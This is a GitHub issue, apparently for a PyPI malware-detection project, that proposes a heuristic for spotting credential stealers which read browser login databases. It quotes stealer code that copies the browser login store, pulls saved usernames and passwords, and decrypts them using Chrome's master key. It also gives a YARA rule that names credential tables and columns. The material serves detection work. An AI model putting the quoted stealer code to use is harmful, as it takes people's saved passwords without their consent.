Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Detect credential stealer using sqlite3 #232

Open
romain-dd opened this issue May 5, 2023 · 3 comments
Open

Detect credential stealer using sqlite3 #232

romain-dd opened this issue May 5, 2023 · 3 comments
Labels
ecosystem/pypi kind/heuristic

Comments

@romain-dd
Copy link
Contributor

romain-dd commented May 5, 2023
edited

Definition: Malware can collect credentials in browser file using sqlite3
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
Sample:

def steal_passwords2(self, name: str, path:str, profile:str):
  path = "path"
  if not os.path.isfile(path):
    return 
  loginvault = self.random_dir_create()
  copy2(path, loginvault)
  conn = sqlite3. connect(loginvault)
  cursor = conn.cursor()
  with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
    for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall(): 
      url, username, password = res
      password = self.dcrpt_val(password, self.masterkey)
      if urI != "":
        f.write (E"URL: (url)\nID: (username)\nPASSWORD: (password) \n\n")
  
  cursor.close()
  conn.close()

Other stealers such as W4sp stealer, and reols package

See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:

rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore {
    meta:
        author = "ditekSHen"
        description = "Detects executables containing SQL queries to confidential data stores. Observed in infostealers"
    strings:
        $select = "select " ascii wide nocase
        $table1 = " from credit_cards" ascii wide nocase
        $table2 = " from logins" ascii wide nocase
        $table3 = " from cookies" ascii wide nocase
        $table4 = " from moz_cookies" ascii wide nocase
        $table5 = " from moz_formhistory" ascii wide nocase
        $table6 = " from moz_logins" ascii wide nocase
        $column1 = "name" ascii wide nocase
        $column2 = "password_value" ascii wide nocase
        $column3 = "encrypted_value" ascii wide nocase
        $column4 = "card_number_encrypted" ascii wide nocase
        $column5 = "isHttpOnly" ascii wide nocase
    condition:
        uint16(0) == 0x5a4d and 2 of ($table*) and 2 of ($column*) and $select
}

Also often coupled with win32crypt.CryptUnprotectData e.g.

def tahg(pene):
    x = json.loads(open(os.environ['LOCALAPPDATA'] + "\\Google\\Chrome\\User Data\\Local State", "r", encoding="utf-8").read())
    try:
        mk = win32crypt.CryptUnprotectData(base64.b64decode(x["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
    except:
        mk = ""
    try:
       return (AES.new(mk, AES.MODE_GCM, pene[3:15]).decrypt(pene[15:])[:-16]).decode()

    except:
        return ""
@christophetd
Copy link
Contributor

Seems related to #159, is it a duplicate or does it make sense to keep both?

@romain-dd
Copy link
Contributor Author

Oh I missed that one. I think we can merge them in one issue. Any objection?

@christophetd
Copy link
Contributor

let's do it!

@christophetd christophetd mentioned this issue May 9, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
ecosystem/pypi kind/heuristic
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@christophetd @romain-dd